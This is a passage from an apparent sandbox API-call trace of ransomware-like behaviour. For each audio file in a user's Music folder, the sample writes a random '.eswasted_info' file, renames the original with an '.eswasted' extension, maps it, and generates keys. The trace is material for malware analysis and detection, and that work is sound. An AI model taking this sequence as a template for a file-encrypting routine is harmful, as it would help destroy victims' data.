[0078.710] SetEndOfFile (hFile=0x124) returned 1 [0078.710] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.710] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0078.710] lstrcpyW (in: lpString1=0x71ec7e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.710] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rJYIzEx.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rjyizex.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rJYIzEx.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rjyizex.mp3.eswasted")) returned 1 [0078.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rJYIzEx.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rjyizex.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0078.716] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0078.718] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0078.718] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.719] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.719] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0078.719] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0078.719] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.730] SetEndOfFile (hFile=0x124) returned 1 [0078.732] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0078.732] CloseHandle (hObject=0x124) returned 1 [0078.733] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0078.734] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0078.734] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0078.734] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.734] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\2Dco4EOv_e.mp3") returned 70 [0078.734] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x296) returned 0x71ec18 [0078.735] lstrcpyW (in: lpString1=0x71eca4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.735] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0078.735] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0078.735] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0078.735] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\2Dco4EOv_e.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\2dco4eov_e.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.736] WriteFile (in: hFile=0x124, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0078.737] SetEndOfFile (hFile=0x124) returned 1 [0078.737] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.737] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0078.737] lstrcpyW (in: lpString1=0x71eca4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.737] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\2Dco4EOv_e.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\2dco4eov_e.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\2Dco4EOv_e.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\2dco4eov_e.mp3.eswasted")) returned 1 [0078.738] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\2Dco4EOv_e.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\2dco4eov_e.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0078.738] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0078.740] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0078.741] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.741] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.741] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0078.742] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0078.742] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.750] SetEndOfFile (hFile=0x124) returned 1 [0078.784] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0078.784] CloseHandle (hObject=0x124) returned 1 [0078.787] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0078.787] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0078.788] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0078.789] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.789] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\FGRNi5kuhJ6QZ0RLW2.wav") returned 78 [0078.789] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a6) returned 0x6f5cc0 [0078.789] lstrcpyW (in: lpString1=0x6f5d5c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.789] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0078.789] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0078.790] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0078.790] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\FGRNi5kuhJ6QZ0RLW2.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\fgrni5kuhj6qz0rlw2.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.790] WriteFile (in: hFile=0x124, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0078.792] SetEndOfFile (hFile=0x124) returned 1 [0078.792] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.792] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0078.792] lstrcpyW (in: lpString1=0x6f5d5c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.792] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\FGRNi5kuhJ6QZ0RLW2.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\fgrni5kuhj6qz0rlw2.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\FGRNi5kuhJ6QZ0RLW2.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\fgrni5kuhj6qz0rlw2.wav.eswasted")) returned 1 [0078.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\FGRNi5kuhJ6QZ0RLW2.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\fgrni5kuhj6qz0rlw2.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0078.831] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0078.835] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0078.836] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0078.836] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.836] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0078.837] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0078.837] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.848] SetEndOfFile (hFile=0x124) returned 1 [0078.850] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0078.850] CloseHandle (hObject=0x124) returned 1 [0078.855] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0078.856] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0078.857] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0078.857] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.857] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\jyIWzk4r4jyVLx.wav") returned 74 [0078.857] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x29e) returned 0x6f5cc0 [0078.857] lstrcpyW (in: lpString1=0x6f5d54, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.857] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0078.857] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0078.858] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0078.858] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\jyIWzk4r4jyVLx.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\jyiwzk4r4jyvlx.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.909] WriteFile (in: hFile=0x124, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0078.911] SetEndOfFile (hFile=0x124) returned 1 [0078.911] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.911] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0078.911] lstrcpyW (in: lpString1=0x6f5d54, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.911] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\jyIWzk4r4jyVLx.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\jyiwzk4r4jyvlx.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\jyIWzk4r4jyVLx.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\jyiwzk4r4jyvlx.wav.eswasted")) returned 1 [0078.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\jyIWzk4r4jyVLx.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\jyiwzk4r4jyvlx.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0078.912] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0078.914] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0078.915] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0078.915] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.915] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0078.916] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0078.916] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.943] SetEndOfFile (hFile=0x124) returned 1 [0078.946] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0078.946] CloseHandle (hObject=0x124) returned 1 [0078.948] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0078.948] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0078.949] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0078.949] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.949] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\kbup8LgYF1.mp3") returned 70 [0078.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x296) returned 0x6f5cc0 [0078.949] lstrcpyW (in: lpString1=0x6f5d4c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0078.949] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0078.949] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0078.950] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0078.950] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0078.950] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\kbup8LgYF1.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\kbup8lgyf1.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.951] WriteFile (in: hFile=0x124, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0078.953] SetEndOfFile (hFile=0x124) returned 1 [0078.953] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0078.953] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0078.953] lstrcpyW (in: lpString1=0x6f5d4c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0078.953] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\kbup8LgYF1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\kbup8lgyf1.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\kbup8LgYF1.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\kbup8lgyf1.mp3.eswasted")) returned 1 [0078.954] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\kbup8LgYF1.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\kbup8lgyf1.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0078.954] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0079.005] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0079.006] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.006] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.006] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0079.007] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.007] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.018] SetEndOfFile (hFile=0x124) returned 1 [0079.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.021] CloseHandle (hObject=0x124) returned 1 [0079.023] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.023] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0079.024] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.024] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.024] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\p-G2GIBppFy.mp3") returned 71 [0079.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x298) returned 0x6f5cc0 [0079.024] lstrcpyW (in: lpString1=0x6f5d4e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x722428 [0079.024] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0079.025] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x722428 | out: pbBuffer=0x722428) returned 1 [0079.025] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\p-G2GIBppFy.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\p-g2gibppfy.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0079.026] WriteFile (in: hFile=0x124, lpBuffer=0x722428*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x722428*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0079.027] SetEndOfFile (hFile=0x124) returned 1 [0079.027] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.027] lstrcpyW (in: lpString1=0x6f5d4e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\p-G2GIBppFy.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\p-g2gibppfy.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\p-G2GIBppFy.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\p-g2gibppfy.mp3.eswasted")) returned 1 [0079.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\UOxsgApI7tAZZG1\\p-G2GIBppFy.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\uoxsgapi7tazzg1\\p-g2gibppfy.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0079.029] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0079.032] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0079.033] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0079.033] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.034] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0079.034] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0079.034] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.046] SetEndOfFile (hFile=0x124) returned 1 [0079.048] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x722428 | out: hHeap=0x6d0000) returned 1 [0079.049] CloseHandle (hObject=0x124) returned 1 [0079.114] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0079.114] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0079.115] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0079.115] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0079.115] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 